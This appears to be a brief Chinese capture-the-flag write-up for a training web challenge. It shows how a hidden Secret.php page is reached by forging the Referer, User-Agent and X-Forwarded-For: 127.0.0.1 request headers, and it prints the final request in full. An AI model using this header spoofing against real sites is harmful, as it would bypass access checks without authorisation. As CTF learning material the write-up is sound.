查看源码在"氛围"这两个字上有隐藏的跳转Secret.php。进入以后页面显示
It doesn't come from 'https://www.Sycsecret.com'
提示页面不是来自这个网址,所以在HackBar上加上Referer:https://www.Sycsecret.com
。之后又提示
Please use "Syclover" browser
加上User-Agent:Syclover
。又提示
No!!! you can only read this locally!!!
加上X-Forwarded-For:127.0.0.1
。
HTTP X-Forwarded-For 介绍
最终的请求头:
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:26715
Upgrade-Insecure-Requests: 1
User-Agent: Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for: 127.0.0.1
referer: https://www.Sycsecret.com
Connection: close